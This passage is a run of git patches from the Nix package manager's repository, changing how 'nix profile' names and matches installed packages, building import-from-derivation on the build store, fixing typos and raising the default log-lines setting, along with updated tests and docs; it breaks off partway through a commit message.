(100%) diff --git a/tests/unit/libexpr/flakeref.cc b/tests/unit/libexpr/flake/flakeref.cc similarity index 100% rename from tests/unit/libexpr/flakeref.cc rename to tests/unit/libexpr/flake/flakeref.cc From 3187bc9ac3dd193b9329ef68c73ac3cca794ed78 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:48:29 +0100 Subject: [PATCH 171/654] nix profile: Remove indices --- src/nix/profile-list.md | 2 -- src/nix/profile-remove.md | 7 ------ src/nix/profile-upgrade.md | 7 ------ src/nix/profile.cc | 39 ++++++++++----------------------- tests/functional/nix-profile.sh | 11 +++++----- 5 files changed, 16 insertions(+), 50 deletions(-) diff --git a/src/nix/profile-list.md b/src/nix/profile-list.md index facfdf0d6..9811b9ec9 100644 --- a/src/nix/profile-list.md +++ b/src/nix/profile-list.md @@ -7,14 +7,12 @@ R""( 
```console # nix profile list Name: gdb - Index: 0 Flake attribute: legacyPackages.x86_64-linux.gdb Original flake URL: flake:nixpkgs Locked flake URL: github:NixOS/nixpkgs/7b38b03d76ab71bdc8dc325e3f6338d984cc35ca Store paths: /nix/store/indzcw5wvlhx6vwk7k4iq29q15chvr3d-gdb-11.1 Name: blender-bin - Index: 1 Flake attribute: packages.x86_64-linux.default Original flake URL: flake:blender-bin Locked flake URL: github:edolstra/nix-warez/91f2ffee657bf834e4475865ae336e2379282d34?dir=blender diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md index c994b79bd..1f6532250 100644 --- a/src/nix/profile-remove.md +++ b/src/nix/profile-remove.md @@ -8,13 +8,6 @@ R""( # nix profile remove hello ``` -* Remove a package by index - *(deprecated, will be removed in a future version)*: - - ```console - # nix profile remove 3 - ``` - * Remove all packages: ```console diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md index 47103edfc..432b8fa94 100644 --- a/src/nix/profile-upgrade.md +++ b/src/nix/profile-upgrade.md @@ -15,13 +15,6 @@ R""( # nix profile upgrade hello ``` -* Upgrade a specific package by index - *(deprecated, will be removed in a future version)*: - - ```console - # nix profile upgrade 0 - ``` - # Description This command upgrades a previously installed package in a Nix profile, diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 1d89815e2..517693cd4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -470,40 +470,28 @@ public: std::string pattern; std::regex reg; }; - typedef std::variant Matcher; + typedef std::variant Matcher; std::vector getMatchers(ref store) { std::vector res; - auto anyIndexMatchers = false; - for (auto & s : _matchers) { - if (auto n = string2Int(s)) { - res.push_back(*n); - anyIndexMatchers = true; - } + if (auto n = string2Int(s)) + throw Error("'nix profile' no longer supports indices ('%d')", *n); else if (store->isStorePath(s)) res.push_back(s); else res.push_back(RegexPattern{s,std::regex(s, 
std::regex::extended | std::regex::icase)}); } - if (anyIndexMatchers) { - warn("Indices are deprecated and will be removed in a future version!\n" - " Refer to packages by their `Name` as printed by `nix profile list`.\n" - " See https://github.com/NixOS/nix/issues/9171 for more information."); - } - return res; } - bool matches(const Store & store, const ProfileElement & element, size_t pos, const std::vector & matchers) + bool matches(const Store & store, const ProfileElement & element, const std::vector & matchers) { for (auto & matcher : matchers) { - if (auto n = std::get_if(&matcher)) { - if (*n == pos) return true; - } else if (auto path = std::get_if(&matcher)) { + if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { if (std::regex_match(element.name, regex->reg)) @@ -539,7 +527,7 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem for (size_t i = 0; i < oldManifest.elements.size(); ++i) { auto & element(oldManifest.elements[i]); - if (!matches(*store, element, i, matchers)) { + if (!matches(*store, element, matchers)) { newManifest.elements.push_back(std::move(element)); } else { notice("removing '%s'", element.identifier()); @@ -553,11 +541,9 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem if (removedCount == 0) { for (auto matcher: matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ + if (const Path * path = std::get_if(&matcher)) { warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ + } else if (const RegexPattern * regex = std::get_if(&matcher)) { warn("'%s' does not match any packages", regex->pattern); } } @@ -595,7 +581,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, 
MixProf for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); - if (!matches(*store, element, i, matchers)) { + if (!matches(*store, element, matchers)) { continue; } @@ -657,11 +643,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf if (upgradedCount == 0) { if (matchedCount == 0) { for (auto & matcher : matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ + if (const Path * path = std::get_if(&matcher)) { warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ + } else if (const RegexPattern * regex = std::get_if(&matcher)) { warn("'%s' does not match any packages", regex->pattern); } } @@ -715,7 +699,6 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", element.name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); - logger->cout("Index: %s", i); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); logger->cout("Original flake URL: %s", element.source->originalRef.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index eced4d3f1..618b6241d 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -49,7 +49,7 @@ cp ./config.nix $flake1Dir/ nix-env -f ./user-envs.nix -i foo-1.0 nix profile list | grep -A2 'Name:.*foo' | grep 'Store paths:.*foo-1.0' nix profile install $flake1Dir -L -nix profile list | grep -A4 'Index:.*1' | grep 'Locked flake URL:.*narHash' +nix profile list | grep -A4 'Name:.*flake1' | grep 'Locked flake URL:.*narHash' [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]] [ -e $TEST_HOME/.nix-profile/share/man ] (! 
[ -e $TEST_HOME/.nix-profile/include ]) @@ -58,9 +58,8 @@ nix profile history | grep "packages.$system.default: ∅ -> 1.0" nix profile diff-closures | grep 'env-manifest.nix: ε → ∅' # Test XDG Base Directories support - export NIX_CONFIG="use-xdg-base-directories = true" -nix profile remove 1 +nix profile remove flake1 nix profile install $flake1Dir [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]] unset NIX_CONFIG @@ -68,7 +67,7 @@ unset NIX_CONFIG # Test upgrading a package. printf NixOS > $flake1Dir/who printf 2.0 > $flake1Dir/version -nix profile upgrade 1 +nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]] nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man" @@ -89,7 +88,7 @@ nix profile diff-closures | grep 'Version 3 -> 4' # Test installing a non-flake package. nix profile install --file ./simple.nix '' [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] -nix profile remove 1 +nix profile remove simple nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] @@ -107,7 +106,7 @@ nix profile wipe-history # Test upgrade to CA package. printf true > $flake1Dir/ca.nix printf 3.0 > $flake1Dir/version -nix profile upgrade 0 +nix profile upgrade flake1 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. From 6268a45b650f563bae2360e0540920a2959bdd40 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:11:25 +0100 Subject: [PATCH 172/654] nix profile: Make profile element names stable The profile manifest is now an object keyed on the name returned by getNameFromURL() at installation time, instead of an array. This ensures that the names of profile elements don't change when other elements are added/removed. 
--- src/nix/profile.cc | 140 ++++++++++++++++---------------- tests/functional/nix-profile.sh | 17 ++-- 2 files changed, 80 insertions(+), 77 deletions(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 517693cd4..8b3918b80 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -45,7 +45,6 @@ const int defaultPriority = 5; struct ProfileElement { StorePathSet storePaths; - std::string name; std::optional source; bool active = true; int priority = defaultPriority; @@ -82,11 +81,6 @@ struct ProfileElement return showVersions(versions); } - bool operator < (const ProfileElement & other) const - { - return std::tuple(identifier(), storePaths) < std::tuple(other.identifier(), other.storePaths); - } - void updateStorePaths( ref evalStore, ref store, @@ -109,7 +103,9 @@ struct ProfileElement struct ProfileManifest { - std::vector elements; + using ProfileElementName = std::string; + + std::map elements; ProfileManifest() { } @@ -119,8 +115,6 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); - /* Keep track of already found names to allow preventing duplicates. 
*/ - std::set foundNames; auto version = json.value("version", 0); std::string sUrl; @@ -131,6 +125,7 @@ struct ProfileManifest sOriginalUrl = "originalUri"; break; case 2: + case 3: sUrl = "url"; sOriginalUrl = "originalUrl"; break; @@ -138,7 +133,9 @@ struct ProfileManifest throw Error("profile manifest '%s' has unsupported version %d", manifestPath, version); } - for (auto & e : json["elements"]) { + auto elems = json["elements"]; + for (auto & elem : elems.items()) { + auto & e = elem.value(); ProfileElement element; for (auto & p : e["storePaths"]) element.storePaths.insert(state.store->parseStorePath((std::string) p)); @@ -155,25 +152,16 @@ struct ProfileManifest }; } - std::string nameCandidate = element.identifier(); - if (e.contains("name")) { - nameCandidate = e["name"]; - } - else if (element.source) { - auto url = parseURL(element.source->to_string()); - auto name = getNameFromURL(url); - if (name) - nameCandidate = *name; - } + std::string name = + elems.is_object() + ? elem.key() + : e.contains("name") + ? (std::string) e["name"] + : element.source + ? 
getNameFromURL(parseURL(element.source->to_string())).value_or(element.identifier()) + : element.identifier(); - auto finalName = nameCandidate; - for (int i = 1; foundNames.contains(finalName); ++i) { - finalName = nameCandidate + std::to_string(i); - } - element.name = finalName; - foundNames.insert(element.name); - - elements.emplace_back(std::move(element)); + addElement(name, std::move(element)); } } @@ -187,16 +175,34 @@ struct ProfileManifest for (auto & drvInfo : drvInfos) { ProfileElement element; element.storePaths = {drvInfo.queryOutPath()}; - element.name = element.identifier(); - elements.emplace_back(std::move(element)); + addElement(std::move(element)); } } } + void addElement(std::string_view nameCandidate, ProfileElement element) + { + std::string finalName(nameCandidate); + for (int i = 1; elements.contains(finalName); ++i) + finalName = nameCandidate + "-" + std::to_string(i); + + elements.insert_or_assign(finalName, std::move(element)); + } + + void addElement(ProfileElement element) + { + auto name = + element.source + ? getNameFromURL(parseURL(element.source->to_string())) + : std::nullopt; + auto name2 = name ? 
*name : element.identifier(); + addElement(name2, std::move(element)); + } + nlohmann::json toJSON(Store & store) const { - auto array = nlohmann::json::array(); - for (auto & element : elements) { + auto es = nlohmann::json::object(); + for (auto & [name, element] : elements) { auto paths = nlohmann::json::array(); for (auto & path : element.storePaths) paths.push_back(store.printStorePath(path)); @@ -210,11 +216,11 @@ struct ProfileManifest obj["attrPath"] = element.source->attrPath; obj["outputs"] = element.source->outputs; } - array.push_back(obj); + es[name] = obj; } nlohmann::json json; - json["version"] = 2; - json["elements"] = array; + json["version"] = 3; + json["elements"] = es; return json; } @@ -225,7 +231,7 @@ struct ProfileManifest StorePathSet references; Packages pkgs; - for (auto & element : elements) { + for (auto & [name, element] : elements) { for (auto & path : element.storePaths) { if (element.active) pkgs.emplace_back(store->printStorePath(path), true, element.priority); @@ -267,33 +273,27 @@ struct ProfileManifest static void printDiff(const ProfileManifest & prev, const ProfileManifest & cur, std::string_view indent) { - auto prevElems = prev.elements; - std::sort(prevElems.begin(), prevElems.end()); - - auto curElems = cur.elements; - std::sort(curElems.begin(), curElems.end()); - - auto i = prevElems.begin(); - auto j = curElems.begin(); + auto i = prev.elements.begin(); + auto j = cur.elements.begin(); bool changes = false; - while (i != prevElems.end() || j != curElems.end()) { - if (j != curElems.end() && (i == prevElems.end() || i->identifier() > j->identifier())) { - logger->cout("%s%s: ∅ -> %s", indent, j->identifier(), j->versions()); + while (i != prev.elements.end() || j != cur.elements.end()) { + if (j != cur.elements.end() && (i == prev.elements.end() || i->first > j->first)) { + logger->cout("%s%s: ∅ -> %s", indent, j->second.identifier(), j->second.versions()); changes = true; ++j; } - else if (i != prevElems.end() && (j == 
curElems.end() || i->identifier() < j->identifier())) { - logger->cout("%s%s: %s -> ∅", indent, i->identifier(), i->versions()); + else if (i != prev.elements.end() && (j == cur.elements.end() || i->first < j->first)) { + logger->cout("%s%s: %s -> ∅", indent, i->second.identifier(), i->second.versions()); changes = true; ++i; } else { - auto v1 = i->versions(); - auto v2 = j->versions(); + auto v1 = i->second.versions(); + auto v2 = j->second.versions(); if (v1 != v2) { - logger->cout("%s%s: %s -> %s", indent, i->identifier(), v1, v2); + logger->cout("%s%s: %s -> %s", indent, i->second.identifier(), v1, v2); changes = true; } ++i; @@ -392,7 +392,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile element.updateStorePaths(getEvalStore(), store, res); - manifest.elements.push_back(std::move(element)); + manifest.addElement(std::move(element)); } try { @@ -402,7 +402,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile // See https://github.com/NixOS/nix/compare/3efa476c5439f8f6c1968a6ba20a31d1239c2f04..1fe5d172ece51a619e879c4b86f603d9495cc102 auto findRefByFilePath = [&](Iterator begin, Iterator end) { for (auto it = begin; it != end; it++) { - auto profileElement = *it; + auto & profileElement = it->second; for (auto & storePath : profileElement.storePaths) { if (conflictError.fileA.starts_with(store->printStorePath(storePath))) { return std::pair(conflictError.fileA, profileElement.toInstallables(*store)); @@ -488,13 +488,17 @@ public: return res; } - bool matches(const Store & store, const ProfileElement & element, const std::vector & matchers) + bool matches( + const Store & store, + const std::string & name, + const ProfileElement & element, + const std::vector & matchers) { for (auto & matcher : matchers) { if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { - if (std::regex_match(element.name, regex->reg)) + if 
(std::regex_match(name, regex->reg)) return true; } } @@ -525,10 +529,9 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem ProfileManifest newManifest; - for (size_t i = 0; i < oldManifest.elements.size(); ++i) { - auto & element(oldManifest.elements[i]); - if (!matches(*store, element, matchers)) { - newManifest.elements.push_back(std::move(element)); + for (auto & [name, element] : oldManifest.elements) { + if (!matches(*store, name, element, matchers)) { + newManifest.elements.insert_or_assign(name, std::move(element)); } else { notice("removing '%s'", element.identifier()); } @@ -574,14 +577,13 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf auto matchers = getMatchers(store); Installables installables; - std::vector indices; + std::vector elems; auto matchedCount = 0; auto upgradedCount = 0; - for (size_t i = 0; i < manifest.elements.size(); ++i) { - auto & element(manifest.elements[i]); - if (!matches(*store, element, matchers)) { + for (auto & [name, element] : manifest.elements) { + if (!matches(*store, name, element, matchers)) { continue; } @@ -637,7 +639,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf }; installables.push_back(installable); - indices.push_back(i); + elems.push_back(&element); } if (upgradedCount == 0) { @@ -661,7 +663,7 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf for (size_t i = 0; i < installables.size(); ++i) { auto & installable = installables.at(i); - auto & element = manifest.elements[indices.at(i)]; + auto & element = *elems.at(i); element.updateStorePaths( getEvalStore(), store, @@ -693,11 +695,11 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro if (json) { std::cout << manifest.toJSON(*store).dump() << "\n"; } else { - for (size_t i = 0; i < manifest.elements.size(); ++i) { - auto & element(manifest.elements[i]); + for (const auto & [i, e] : 
enumerate(manifest.elements)) { + auto & [name, element] = e; if (i) logger->cout(""); logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", - element.name, + name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 618b6241d..003af5174 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -59,7 +59,7 @@ nix profile diff-closures | grep 'env-manifest.nix: ε → ∅' # Test XDG Base Directories support export NIX_CONFIG="use-xdg-base-directories = true" -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' nix profile install $flake1Dir [[ $($TEST_HOME/.local/state/nix/profile/bin/hello) = "Hello World" ]] unset NIX_CONFIG @@ -80,7 +80,7 @@ nix profile rollback # Test uninstall. [ -e $TEST_HOME/.nix-profile/bin/foo ] -nix profile remove foo +nix profile remove foo 2>&1 | grep 'removed 1 packages' (! [ -e $TEST_HOME/.nix-profile/bin/foo ]) nix profile history | grep 'foo: 1.0 -> ∅' nix profile diff-closures | grep 'Version 3 -> 4' @@ -88,7 +88,7 @@ nix profile diff-closures | grep 'Version 3 -> 4' # Test installing a non-flake package. nix profile install --file ./simple.nix '' [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] -nix profile remove simple +nix profile remove simple 2>&1 | grep 'removed 1 packages' nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" 
]] @@ -96,8 +96,9 @@ nix profile install $(nix-build --no-out-link ./simple.nix) mkdir $TEST_ROOT/simple-too cp ./simple.nix ./config.nix simple.builder.sh $TEST_ROOT/simple-too nix profile install --file $TEST_ROOT/simple-too/simple.nix '' -nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple1' -nix profile remove simple1 +nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple-1' +nix profile remove simple 2>&1 | grep 'removed 1 packages' +nix profile remove simple-1 2>&1 | grep 'removed 1 packages' # Test wipe-history. nix profile wipe-history @@ -110,7 +111,7 @@ nix profile upgrade flake1 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' printf 4.0 > $flake1Dir/version printf Utrecht > $flake1Dir/who nix profile install $flake1Dir @@ -131,14 +132,14 @@ nix profile upgrade flake1 [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' nix profile install "$flake1Dir^man" (! [ -e $TEST_HOME/.nix-profile/bin/hello ]) [ -e $TEST_HOME/.nix-profile/share/man ] (! [ -e $TEST_HOME/.nix-profile/include ]) # test priority -nix profile remove flake1 +nix profile remove flake1 2>&1 | grep 'removed 1 packages' # Make another flake. flake2Dir=$TEST_ROOT/flake2 From a748e88bf4cca0fdc6ce75188e88017a7899d16b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:27:31 +0100 Subject: [PATCH 173/654] nix profile: Remove check for "name" attribute in manifests AFAIK, we've never emitted this attribute. --- src/nix/profile.cc | 2 -- 1 file changed, 2 deletions(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 8b3918b80..1b0c333bd 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -155,8 +155,6 @@ struct ProfileManifest std::string name = elems.is_object() ? 
elem.key() - : e.contains("name") - ? (std::string) e["name"] : element.source ? getNameFromURL(parseURL(element.source->to_string())).value_or(element.identifier()) : element.identifier(); From 936a3642264ac159f3f9093710be3465b70e0e89 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 22 Dec 2023 16:35:58 +0100 Subject: [PATCH 174/654] getNameFromURL(): Support uppercase characters in attribute names In particular, this makes it handle 'legacyPackages' correctly. --- src/libexpr/flake/url-name.cc | 2 +- tests/unit/libexpr/flake/url-name.cc | 8 +++++--- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/src/libexpr/flake/url-name.cc b/src/libexpr/flake/url-name.cc index 7e51aa2e1..753f197d5 100644 --- a/src/libexpr/flake/url-name.cc +++ b/src/libexpr/flake/url-name.cc @@ -4,7 +4,7 @@ namespace nix { -static const std::string attributeNamePattern("[a-z0-9_-]+"); +static const std::string attributeNamePattern("[a-zA-Z0-9_-]+"); static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?"); static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); diff --git a/tests/unit/libexpr/flake/url-name.cc b/tests/unit/libexpr/flake/url-name.cc index 84d32837c..85387b323 100644 --- a/tests/unit/libexpr/flake/url-name.cc +++ b/tests/unit/libexpr/flake/url-name.cc @@ -5,11 +5,13 @@ namespace nix { /* ----------- tests for url-name.hh --------------------------------------------------*/ - TEST(getNameFromURL, getsNameFromURL) { + TEST(getNameFromURL, getNameFromURL) { ASSERT_EQ(getNameFromURL(parseURL("path:/home/user/project")), "project"); ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); - ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); - 
ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#legacyPackages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.Hello")), "Hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "mylaptop"); ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex"); ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj"); From 9cb287657bec5a969d8bb1678d598d9fa820e60b Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sat, 23 Dec 2023 17:15:09 -0500 Subject: [PATCH 175/654] remote-store test: Break out IFD expression into a separate file --- tests/functional/ifd.nix | 10 ++++++++++ tests/functional/remote-store.sh | 13 +------------ 2 files changed, 11 insertions(+), 12 deletions(-) create mode 100644 tests/functional/ifd.nix diff --git a/tests/functional/ifd.nix b/tests/functional/ifd.nix new file mode 100644 index 000000000..d0b9b54ad --- /dev/null +++ b/tests/functional/ifd.nix @@ -0,0 +1,10 @@ +with import ./config.nix; +import ( + mkDerivation { + name = "foo"; + bla = import ./dependencies.nix {}; + buildCommand = " + echo \\\"hi\\\" > $out + "; + } +) diff --git a/tests/functional/remote-store.sh b/tests/functional/remote-store.sh index 5c7bfde46..dc80f8b55 100644 --- a/tests/functional/remote-store.sh +++ b/tests/functional/remote-store.sh @@ -19,18 +19,7 @@ else fi # Test import-from-derivation through the daemon. 
-[[ $(nix eval --impure --raw --expr ' - with import ./config.nix; - import ( - mkDerivation { - name = "foo"; - bla = import ./dependencies.nix {}; - buildCommand = " - echo \\\"hi\\\" > $out - "; - } - ) -') = hi ]] +[[ $(nix eval --impure --raw --file ./ifd.nix) = hi ]] storeCleared=1 NIX_REMOTE_=$NIX_REMOTE $SHELL ./user-envs.sh From c3942ef85ffbd83391410fbf012f1de366d2463c Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sat, 23 Dec 2023 21:26:12 -0500 Subject: [PATCH 176/654] Build IFD in the build store when using eval-store. Previously, IFDs would be built within the eval store, even though one is typically using `--eval-store` precisely to *avoid* local builds. Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. --- doc/manual/rl-next/ifd-eval-store.md | 8 ++++++++ src/libexpr/primops.cc | 19 +++++++++++++------ tests/functional/eval-store.sh | 8 ++++++++ 3 files changed, 29 insertions(+), 6 deletions(-) create mode 100644 doc/manual/rl-next/ifd-eval-store.md diff --git a/doc/manual/rl-next/ifd-eval-store.md b/doc/manual/rl-next/ifd-eval-store.md new file mode 100644 index 000000000..835e7e7a3 --- /dev/null +++ b/doc/manual/rl-next/ifd-eval-store.md @@ -0,0 +1,8 @@ +--- +synopsis: import-from-derivation builds the derivation in the build store +prs: 9661 +--- + +When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. + +Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. 
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index a1502da45..58826b3bd 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -84,14 +84,14 @@ StringMap EvalState::realiseContext(const NixStringContext & context) /* Build/substitute the context. */ std::vector buildReqs; for (auto & d : drvs) buildReqs.emplace_back(DerivedPath { d }); - store->buildPaths(buildReqs); + buildStore->buildPaths(buildReqs, bmNormal, store); + + StorePathSet outputsToCopyAndAllow; for (auto & drv : drvs) { - auto outputs = resolveDerivedPath(*store, drv); + auto outputs = resolveDerivedPath(*buildStore, drv, &*store); for (auto & [outputName, outputPath] : outputs) { - /* Add the output of this derivations to the allowed - paths. */ - allowPath(store->toRealPath(outputPath)); + outputsToCopyAndAllow.insert(outputPath); /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { @@ -101,12 +101,19 @@ StringMap EvalState::realiseContext(const NixStringContext & context) .drvPath = drv.drvPath, .output = outputName, }).render(), - store->printStorePath(outputPath) + buildStore->printStorePath(outputPath) ); } } } + if (store != buildStore) copyClosure(*buildStore, *store, outputsToCopyAndAllow); + for (auto & outputPath : outputsToCopyAndAllow) { + /* Add the output of this derivations to the allowed + paths. */ + allowPath(store->toRealPath(outputPath)); + } + return res; } diff --git a/tests/functional/eval-store.sh b/tests/functional/eval-store.sh index ec99fd953..9937ecbce 100644 --- a/tests/functional/eval-store.sh +++ b/tests/functional/eval-store.sh @@ -40,3 +40,11 @@ if [[ ! -n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then (! 
ls $NIX_STORE_DIR/*.drv) fi ls $eval_store/nix/store/*.drv + +clearStore +rm -rf "$eval_store" + +# Confirm that import-from-derivation builds on the build store +[[ $(nix eval --eval-store "$eval_store?require-sigs=false" --impure --raw --file ./ifd.nix) = hi ]] +ls $NIX_STORE_DIR/*dependencies-top/foobar +(! ls $eval_store/nix/store/*dependencies-top/foobar) From e2399fc94935c9bc1ae6670c5d445214e039ac84 Mon Sep 17 00:00:00 2001 From: Brian Le Date: Tue, 26 Dec 2023 17:12:28 -0500 Subject: [PATCH 177/654] Change "dervation" typos to "derivation" --- doc/manual/src/language/derivations.md | 2 +- src/libstore/remote-store.cc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/language/derivations.md b/doc/manual/src/language/derivations.md index 2aded5527..cbb30d074 100644 --- a/doc/manual/src/language/derivations.md +++ b/doc/manual/src/language/derivations.md @@ -274,7 +274,7 @@ The [`builder`](#attr-builder) is executed as follows: directory (typically, `/nix/store`). - `NIX_ATTRS_JSON_FILE` & `NIX_ATTRS_SH_FILE` if `__structuredAttrs` - is set to `true` for the dervation. A detailed explanation of this + is set to `true` for the derivation. A detailed explanation of this behavior can be found in the [section about structured attrs](./advanced-attributes.md#adv-attr-structuredAttrs). diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 4d0113594..f0df646ca 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -186,7 +186,7 @@ void RemoteStore::ConnectionHandle::processStderr(Sink * sink, Source * source, if (m.find("parsing derivation") != std::string::npos && m.find("expected string") != std::string::npos && m.find("Derive([") != std::string::npos) - throw Error("%s, this might be because the daemon is too old to understand dependencies on dynamic derivations. 
Check to see if the raw dervation is in the form '%s'", std::move(m), "DrvWithVersion(..)"); + throw Error("%s, this might be because the daemon is too old to understand dependencies on dynamic derivations. Check to see if the raw derivation is in the form '%s'", std::move(m), "DrvWithVersion(..)"); } throw; } From b6313f64f7be11e0fe74b17cb31dbbf12b2e7725 Mon Sep 17 00:00:00 2001 From: DavHau Date: Wed, 27 Dec 2023 19:57:27 +0700 Subject: [PATCH 178/654] saner default for log-lines: change to 25 This seems to be a much saner default. 10 lines are just not enough in so many cases. --- src/libstore/globals.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index b35dc37a1..c12998f8e 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -144,7 +144,7 @@ public: */ bool verboseBuild = true; - Setting logLines{this, 10, "log-lines", + Setting logLines{this, 25, "log-lines", "The number of lines of the tail of " "the log to show if a build fails."}; From 99a691c8a1abffd30077bd5f005cb8d4bbafae5c Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 24 Dec 2023 21:14:08 +0100 Subject: [PATCH 179/654] don't use istreams in hot paths MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit istream sentry objects are very expensive for single-character operations, and since we don't configure exception masks for the istreams used here they don't even do anything. all we need is 